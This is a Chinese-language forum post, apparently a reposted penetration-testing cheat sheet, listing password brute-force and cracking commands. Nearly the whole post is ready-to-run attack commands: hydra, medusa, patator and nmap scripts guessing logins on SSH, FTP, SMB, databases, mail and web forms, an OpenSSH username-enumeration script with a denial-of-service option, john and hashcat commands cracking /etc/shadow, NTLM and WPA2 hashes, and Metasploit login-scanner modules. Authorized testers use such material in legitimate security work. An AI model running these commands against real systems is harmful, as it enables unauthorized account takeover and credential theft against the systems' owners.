设为首页 收藏本站
查看: 961|回复: 0

[经验分享] 暴力破解

[复制链接]

尚未签到

发表于 2017-7-9 06:19:58 | 显示全部楼层 |阅读模式

  SMB:
  enum -D -u administrator -f passwords.txt 服务器名
  FTP:
  medusa -H ip.txt -U user.txt -P passwd.txt -M ftp
  hydra -l 用户名 -P 密码字典 -e ns -vV IP ftp
  hydra -L user.txt -P pass.txt -F ftp://127.0.0.1:21
  破解ssh
hydra -L user.txt -P pass.txt -F ssh://127.0.0.1:22
patator ssh_login host=127.0.0.1 user=root password=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'
  hydra



破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
破解teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
破解smb
# hydra -L user.txt -P pass.txt -F smb://127.0.0.1

  破解MSSQL
 hydra -L user.txt -P pass.txt -F mssql://127.0.0.1:1433
  破解HTTP基础认证
 # hydra -L user.txt -P pass.txt -F http://127.0.0.1:2048/auth

Web表单登录破解
get方式提交,破解web登录:
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登录(不支持验证码)
  hydra -l admin -P pass.lst -o ok.lst -t 1 -f IP http-post-form "/index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>"
  说明:用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,
  -f 是当破解了一个密码就停止,ip就是目标ip
  http-post-form表示破解是采用http 的post 方式提交的表单密码破解。
  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义   
  针对 OpenSSH 用户进行枚举时序攻击



注:枚举时序攻击(“Enumeration Timing Attack”)属于侧信道攻击/旁路攻击(Side Channel Attack),
侧信道攻击是指利用信道外的信息,比如加解密的速度/加解密时芯片引脚的电压/密文传输的流量和途径等进行攻击的方式,一个词形容就是“旁敲侧击”。–

osueta 是一个用于对 OpenSSH 进行时序攻击的 python2 脚本,其可以利用时序攻击枚举 OpenSSH 用户名,并在一定条件下可以对 OpenSSH 服务器进行 DOS 攻击。
# https://github.com/c0r3dump3d/osueta
$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
$ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt
  破解


  nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.1.4   破解rsync
nmap --script informix-brute -p 9088 192.168.1.4    informix数据库破解
nmap -p 5432 --script pgsql-brute 192.168.1.4      pgsql破解
nmap -sU --script snmp-brute 192.168.1.4          snmp破解
nmap -sV --script=telnet-brute 192.168.1.4        telnet破解
  枚举 Samba
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
  枚举 SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
  # SMTP  爆破 (patator)



$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.1.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.1.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst &shy;x ignore:fgrep='incorrect password or account name'
  MD5破解   (例:md5.txt文件,没有salt的MD5哈希)
  john -format=raw-md5 -pot=./wordlist.pot  md5.txt
  john -format=raw-md5-opencl  -wordlist=wordlist.lst  -rules:Single  md5.txt   (利用GPU加快破解)
  Hash破解
  hashcat -m 400 -a 0 hash /root/rockyou.txt  破解hash
  破解linux密码



john --wordlist=password.lst "/etc/shadow"  #字典模式
john –single "/etc/shadow" #Single模式根据用户名产生变化来进行猜解
john -i:Digits -user:test1 user1  #遍历模式,使用组合密码的所有可能情况
参数:
  ALL(0到8个字符长的所有字符组合) Alpha(1到8个字符长的所有字母组合)
  Digits(1到8个字符长的所有数字组合) Alnum(1到8个字符长的所有字母/数字组合)
john -show hashes  忘记密码时可使用类似命令查看已破解的密码
john --restore hashes   在原来的基础上继续破解(破解结果出现问号时)
  ZIP密码破解:



(1)fcrackzip爆破 :  fcrackzip -b -l 4-4 -u 1D7.zip -v -c 1
(其中,-b爆破,-l说明密码长度,-u是文件,-v是详细输出,-c是密码字典类型)
  oclHashcat
  无论是MD5,MSSQL,SHA1还是其他哈希,破解命令都是一条,-m设定哈希类型



破解WPAv2哈希
cudaHashcat-plus64.exe -m 2500 out.hccap
破解NTLM哈希
cudaHashcat-plus64.exe -m 1000 NTLM.txt path/wordlist.txt
  Metasploit中的一些爆破模块



auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-391832-1-1.html 上篇帖子: Xmodem Bootloader 下篇帖子: VLAN虚拟局域网技术(二)-计算机网络
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表